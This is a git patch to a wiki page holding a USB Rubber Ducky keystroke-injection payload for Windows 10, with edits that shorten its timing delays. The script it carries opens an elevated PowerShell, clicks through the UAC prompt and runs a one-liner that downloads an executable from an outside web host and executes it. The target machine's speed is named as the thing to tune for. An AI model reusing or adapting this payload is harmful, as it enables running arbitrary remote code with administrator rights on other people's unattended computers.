From d99bb48c7a5a0c625a6dace88e70fac706763c87 Mon Sep 17 00:00:00 2001 From: Hunter Date: Wed, 2 Nov 2016 13:10:05 -0400 Subject: [PATCH] Updated Payload Windows 10 : Download and execute file with Powershell (markdown) --- ...ndows-10-:-Download-and-execute-file-with-Powershell.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/Payload---Windows-10-:-Download-and-execute-file-with-Powershell.md b/Payload---Windows-10-:-Download-and-execute-file-with-Powershell.md index 77bdd9c..669b197 100644 --- a/Payload---Windows-10-:-Download-and-execute-file-with-Powershell.md +++ b/Payload---Windows-10-:-Download-and-execute-file-with-Powershell.md @@ -2,8 +2,9 @@ A ducky script that uses the powershell to download and execute a file from a we Change the link and what name to save the file as. +Execution time: 5-8 seconds (delays will need to be modified based on target machine speed) -Preview: https://www.youtube.com/watch?v=gGHjdtamQ9A +Preview video: https://www.youtube.com/watch?v=gGHjdtamQ9A ``` REM Windows 10: Poweshell administrator download and execute file @@ -13,7 +14,7 @@ REM REM start of script REM REM let the HID enumerate -DELAY 2000 +DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance @@ -21,6 +22,6 @@ STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y -DELAY 500 +DELAY 200 STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; ``` \ No newline at end of file